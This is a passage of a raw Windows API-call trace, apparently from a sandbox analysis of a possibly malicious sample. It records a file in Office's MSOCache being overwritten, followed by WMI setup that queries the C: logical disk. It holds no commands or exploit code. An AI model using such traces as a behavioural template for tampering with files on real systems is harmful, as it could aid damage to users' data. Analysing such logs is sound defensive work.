Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x328 [0158.994] GetFileType (hFile=0x328) returned 0x1 [0158.994] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f420) returned 1 [0158.995] GetFileType (hFile=0x328) returned 0x1 [0158.995] WriteFile (in: hFile=0x328, lpBuffer=0x3708b1c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x6c0f4b4, lpOverlapped=0x0 | out: lpBuffer=0x3708b1c*, lpNumberOfBytesWritten=0x6c0f4b4*=0x20, lpOverlapped=0x0) returned 1 [0158.996] CloseHandle (hObject=0x328) returned 1 [0158.996] CoTaskMemAlloc (cb=0x20c) returned 0x66ca998 [0158.996] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x66ca998 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0158.996] CoTaskMemFree (pv=0x66ca998) [0158.996] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6c0ef18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0158.996] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0f460 | out: ppv=0x6c0f460*=0xb51e34) returned 0x0 [0158.996] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6c0f458 | out: pAptType=0x6c0f458*=1) returned 0x0 [0158.997] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6c0f45c | out: ppvObject=0x6c0f45c*=0x0) returned 0x80004002 [0158.997] IUnknown:Release (This=0xb51e34) returned 0x1 [0158.998] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0edc8 | out: ppv=0x6c0edc8*=0x6024b00) returned 0x0 [0158.998] WbemDefPath:IUnknown:QueryInterface (in: This=0x6024b00, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0efe0 | out: ppvObject=0x6c0efe0*=0x0) returned 0x80004002 [0158.998] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6024b00, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eff4 | out: ppvObject=0x6c0eff4*=0x6026100) returned 0x0 [0158.998] WbemDefPath:IUnknown:Release (This=0x6024b00) returned 0x0 [0158.998] WbemDefPath:IUnknown:QueryInterface (in: This=0x6026100, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ec14 | out: ppvObject=0x6c0ec14*=0x6026100) returned 0x0 [0158.998] WbemDefPath:IUnknown:QueryInterface (in: This=0x6026100, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0ebd0 | out: ppvObject=0x6c0ebd0*=0x0) returned 0x80004002 [0158.998] WbemDefPath:IUnknown:AddRef (This=0x6026100) returned 0x3 [0158.998] WbemDefPath:IUnknown:QueryInterface (in: This=0x6026100, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e52c | out: ppvObject=0x6c0e52c*=0x0) returned 0x80004002 [0158.998] WbemDefPath:IUnknown:QueryInterface (in: This=0x6026100, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e4dc | out: ppvObject=0x6c0e4dc*=0x0) returned 0x80004002 [0158.998] WbemDefPath:IUnknown:QueryInterface (in: This=0x6026100, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e4e8 | out: ppvObject=0x6c0e4e8*=0xbb5a88) returned 0x0 [0158.998] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbb5a88, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6c0e4f0 | out: pCid=0x6c0e4f0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0158.998] WbemDefPath:IUnknown:Release (This=0xbb5a88) returned 0x3 [0158.998] CoGetContextToken (in: pToken=0x6c0e548 | out: pToken=0x6c0e548) returned 0x0 [0158.998] CoGetContextToken (in: pToken=0x6c0e950 | out: pToken=0x6c0e950) returned 0x0 [0158.999] WbemDefPath:IUnknown:QueryInterface (in: This=0x6026100, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e9e0 | out: ppvObject=0x6c0e9e0*=0x0) returned 0x80004002 [0158.999] WbemDefPath:IUnknown:Release (This=0x6026100) returned 0x2 [0158.999] WbemDefPath:IUnknown:Release (This=0x6026100) returned 0x1 [0158.999] CoGetContextToken (in: pToken=0x6c0f2d8 | out: pToken=0x6c0f2d8) returned 0x0 [0158.999] CoGetContextToken (in: pToken=0x6c0f238 | out: pToken=0x6c0f238) returned 0x0 [0158.999] WbemDefPath:IUnknown:QueryInterface (in: This=0x6026100, riid=0x6c0f308*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6c0f304 | out: ppvObject=0x6c0f304*=0x6026100) returned 0x0 [0158.999] WbemDefPath:IUnknown:AddRef (This=0x6026100) returned 0x3 [0158.999] WbemDefPath:IUnknown:Release (This=0x6026100) returned 0x2 [0158.999] WbemDefPath:IWbemPath:SetText (This=0x6026100, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0158.999] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6026100, puCount=0x6c0f48c | out: puCount=0x6c0f48c*=0x0) returned 0x0 [0158.999] WbemDefPath:IWbemPath:GetText (in: This=0x6026100, lFlags=2, puBuffLength=0x6c0f488*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f488*=0x20, pszText=0x0) returned 0x0 [0158.999] WbemDefPath:IWbemPath:GetText (in: This=0x6026100, lFlags=2, puBuffLength=0x6c0f488*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6c0f488*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0158.999] WbemDefPath:IWbemPath:GetInfo (in: This=0x6026100, uRequestedInfo=0x0, puResponse=0x6c0f494 | out: puResponse=0x6c0f494*=0xc19) returned 0x0 [0158.999] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6026100, puCount=0x6c0f48c | out: puCount=0x6c0f48c*=0x0) returned 0x0 [0158.999] WbemDefPath:IWbemPath:GetInfo (in: This=0x6026100, uRequestedInfo=0x0, puResponse=0x6c0f494 | out: puResponse=0x6c0f494*=0xc19) returned 0x0 [0158.999] WbemDefPath:IWbemPath:GetInfo (in: This=0x6026100, uRequestedInfo=0x0, puResponse=0x6c0f494 | out: puResponse=0x6c0f494*=0xc19) returned 0x0 [0158.999] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6026100, puCount=0x6c0f40c | out: puCount=0x6c0f40c*=0x0) returned 0x0 [0158.999] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x6c0f3f8 | out: puCount=0x6c0f3f8*=0x2) returned 0x0 [0158.999] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6c0f3f4*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f3f4*=0xf, pszText=0x0) returned 0x0 [0158.999] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6c0f3f4*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f3f4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0158.999] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0f3a8 | out: ppv=0x6c0f3a8*=0xb51e34) returned 0x0 [0158.999] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6c0f3a0 | out: pAptType=0x6c0f3a0*=1) returned 0x0 [0158.999] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6c0f3a4 | out: ppvObject=0x6c0f3a4*=0x0) returned 0x80004002 [0158.999] IUnknown:Release (This=0xb51e34) returned 0x1 [0159.000] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0ed10 | out: ppv=0x6c0ed10*=0x6024b60) returned 0x0 [0159.000] WbemDefPath:IUnknown:QueryInterface (in: This=0x6024b60, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0ef28 | out: ppvObject=0x6c0ef28*=0x0) returned 0x80004002 [0159.000] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6024b60, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ef3c | out: ppvObject=0x6c0ef3c*=0x6026170) returned 0x0 [0159.000] WbemDefPath:IUnknown:Release (This=0x6024b60) returned 0x0 [0159.000] WbemDefPath:IUnknown:QueryInterface (in: This=0x6026170, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eb5c | out: ppvObject=0x6c0eb5c*=0x6026170) returned 0x0 [0159.000] WbemDefPath:IUnknown:QueryInterface (in: This=0x6026170, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0eb18 | out: ppvObject=0x6c0eb18*=0x0) returned 0x80004002 [0159.000] WbemDefPath:IUnknown:AddRef (This=0x6026170) returned 0x3 [0159.000] WbemDefPath:IUnknown:QueryInterface (in: This=0x6026170, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e474 | out: ppvObject=0x6c0e474*=0x0) returned 0x80004002 [0159.001] WbemDefPath:IUnknown:QueryInterface (in: This=0x6026170, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e424 | out: ppvObject=0x6c0e424*=0x0) returned 0x80004002 [0159.001] WbemDefPath:IUnknown:QueryInterface (in: This=0x6026170, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e430 | out: ppvObject=0x6c0e430*=0xbb5928) returned 0x0 [0159.001] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbb5928, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6c0e438 | out: pCid=0x6c0e438*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0159.001] WbemDefPath:IUnknown:Release (This=0xbb5928) returned 0x3 [0159.001] CoGetContextToken (in: pToken=0x6c0e490 | out: pToken=0x6c0e490) returned 0x0 [0159.001] CoGetContextToken (in: pToken=0x6c0e898 | out: pToken=0x6c0e898) returned 0x0 [0159.001] WbemDefPath:IUnknown:QueryInterface (in: This=0x6026170, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e928 | out: ppvObject=0x6c0e928*=0x0) returned 0x80004002 [0159.001] WbemDefPath:IUnknown:Release (This=0x6026170) returned 0x2 [0159.001] WbemDefPath:IUnknown:Release (This=0x6026170) returned 0x1 [0159.001] CoGetContextToken (in: pToken=0x6c0f220 | out: pToken=0x6c0f220) returned 0x0 [0159.001] CoGetContextToken (in: pToken=0x6c0f180 | out: pToken=0x6c0f180) returned 0x0 [0159.001] WbemDefPath:IUnknown:QueryInterface (in: This=0x6026170, riid=0x6c0f250*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6c0f24c | out: ppvObject=0x6c0f24c*=0x6026170) returned 0x0 [0159.001] WbemDefPath:IUnknown:AddRef (This=0x6026170) returned 0x3 [0159.001] WbemDefPath:IUnknown:Release (This=0x6026170) returned 0x2 [0159.001] WbemDefPath:IWbemPath:SetText (This=0x6026170, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0159.001] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6026170, puCount=0x6c0f3d0 | out: puCount=0x6c0f3d0*=0x2) returned 0x0 [0159.001] WbemDefPath:IWbemPath:GetText (in: This=0x6026170, lFlags=4, puBuffLength=0x6c0f3cc*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f3cc*=0xf, pszText=0x0) returned 0x0 [0159.001] WbemDefPath:IWbemPath:GetText (in: This=0x6026170, lFlags=4, puBuffLength=0x6c0f3cc*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f3cc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0159.001] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0f3d0 | out: ppv=0x6c0f3d0*=0xb51e34) returned 0x0 [0159.001] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6c0f3c8 | out: pAptType=0x6c0f3c8*=1) returned 0x0 [0159.001] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6c0f3cc | out: ppvObject=0x6c0f3cc*=0x0) returned 0x80004002 [0159.001] IUnknown:Release (This=0xb51e34) returned 0x1 [0159.002] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0eff0 | out: ppv=0x6c0eff0*=0x601f360) returned 0x0 [0159.002] WbemLocator:IUnknown:QueryInterface (in: This=0x601f360, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0f208 | out: ppvObject=0x6c0f208*=0x0) returned 0x80004002 [0159.002] WbemLocator:IClassFactory:CreateInstance (in: This=0x601f360, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f21c | out: ppvObject=0x6c0f21c*=0x6024b90) returned 0x0 [0159.002] WbemLocator:IUnknown:Release (This=0x601f360) returned 0x0 [0159.002] WbemLocator:IUnknown:QueryInterface (in: This=0x6024b90, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ee3c | out: ppvObject=0x6c0ee3c*=0x6024b90) returned 0x0 [0159.002] WbemLocator:IUnknown:QueryInterface (in: This=0x6024b90, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0edf8 | out: ppvObject=0x6c0edf8*=0x0) returned 0x80004002 [0159.002] WbemLocator:IUnknown:AddRef (This=0x6024b90) returned 0x3 [0159.002] WbemLocator:IUnknown:QueryInterface (in: This=0x6024b90, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e754 | out: ppvObject=0x6c0e754*=0x0) returned 0x80004002 [0159.002] WbemLocator:IUnknown:QueryInterface (in: This=0x6024b90, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e704 | out: ppvObject=0x6c0e704*=0x0) returned 0x80004002 [0159.002] WbemLocator:IUnknown:QueryInterface (in: This=0x6024b90, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e710 | out: ppvObject=0x6c0e710*=0x0) returned 0x80004002 [0159.002] CoGetContextToken (in: pToken=0x6c0e770 | out: pToken=0x6c0e770) returned 0x0 [0159.003] CoGetContextToken (in: pToken=0x6c0eb78 | out: pToken=0x6c0eb78) returned 0x0 [0159.003] WbemLocator:IUnknown:QueryInterface (in: This=0x6024b90, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ec08 | out: ppvObject=0x6c0ec08*=0x0) returned 0x80004002 [0159.003] WbemLocator:IUnknown:Release (This=0x6024b90) returned 0x2 [0159.003] WbemLocator:IUnknown:Release (This=0x6024b90) returned 0x1 [0159.003] CoGetContextToken (in: pToken=0x6c0f1e8 | out: pToken=0x6c0f1e8) returned 0x0 [0159.003] CoGetContextToken (in: pToken=0x6c0f148 | out: pToken=0x6c0f148) returned 0x0 [0159.003] WbemLocator:IUnknown:QueryInterface (in: This=0x6024b90, riid=0x6c0f218*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6c0f214 | out: ppvObject=0x6c0f214*=0x6024b90) returned 0x0 [0159.003] WbemLocator:IUnknown:AddRef (This=0x6024b90) returned 0x3 [0159.003] WbemLocator:IUnknown:Release (This=0x6024b90) returned 0x2 [0159.003] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6026170, puCount=0x6c0f3ac | out: puCount=0x6c0f3ac*=0x2) returned 0x0 [0159.003] WbemDefPath:IWbemPath:GetText (in: This=0x6026170, lFlags=8, puBuffLength=0x6c0f3a8*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f3a8*=0xf, pszText=0x0) returned 0x0 [0159.003] WbemDefPath:IWbemPath:GetText (in: This=0x6026170, lFlags=8, puBuffLength=0x6c0f3a8*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f3a8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0159.003] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6c0f284 | out: ppv=0x6c0f284*=0x6024ba0) returned 0x0 [0159.003] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6024ba0, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x6c0f318 | out: ppNamespace=0x6c0f318*=0x60279ac) returned 0x0 [0159.821] WbemLocator:IUnknown:QueryInterface (in: This=0x60279ac, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f1b4 | out: ppvObject=0x6c0f1b4*=0xb5b9a4) returned 0x0 [0159.821] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5b9a4, pProxy=0x60279ac, pAuthnSvc=0x6c0f204, pAuthzSvc=0x6c0f200, pServerPrincName=0x6c0f1f8, pAuthnLevel=0x6c0f1fc, pImpLevel=0x6c0f1ec, pAuthInfo=0x6c0f1f0, pCapabilites=0x6c0f1f4 | out: pAuthnSvc=0x6c0f204*=0xa, pAuthzSvc=0x6c0f200*=0x0, pServerPrincName=0x6c0f1f8, pAuthnLevel=0x6c0f1fc*=0x6, pImpLevel=0x6c0f1ec*=0x2, pAuthInfo=0x6c0f1f0, pCapabilites=0x6c0f1f4*=0x1) returned 0x0 [0159.821] WbemLocator:IUnknown:Release (This=0xb5b9a4) returned 0x1 [0159.821] WbemLocator:IUnknown:QueryInterface (in: This=0x60279ac, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f1a8 | out: ppvObject=0x6c0f1a8*=0xb5b9c4) returned 0x0 [0159.821] WbemLocator:IUnknown:QueryInterface (in: This=0x60279ac, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f1a4 | out: ppvObject=0x6c0f1a4*=0xb5b9a4) returned 0x0 [0159.821] WbemLocator:IClientSecurity:SetBlanket (This=0xb5b9a4, pProxy=0x60279ac, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0159.821] WbemLocator:IUnknown:Release (This=0xb5b9a4) returned 0x2 [0159.822] WbemLocator:IUnknown:Release (This=0xb5b9c4) returned 0x1 [0159.822] CoTaskMemFree (pv=0x66ac650) [0159.822] WbemLocator:IUnknown:Release (This=0x6024ba0) returned 0x0 [0159.822] WbemLocator:IUnknown:QueryInterface (in: This=0x60279ac, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eda4 | out: ppvObject=0x6c0eda4*=0xb5b9c4) returned 0x0 [0159.822] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b9c4, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0ed60 | out: ppvObject=0x6c0ed60*=0x0) returned 0x80004002 [0159.822] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b9c4, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0eb7c | out: ppvObject=0x6c0eb7c*=0x0) returned 0x80004002 [0159.822] WbemLocator:IUnknown:AddRef (This=0xb5b9c4) returned 0x3 [0159.822] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b9c4, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e6bc | out: ppvObject=0x6c0e6bc*=0x0) returned 0x80004002 [0159.823] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b9c4, 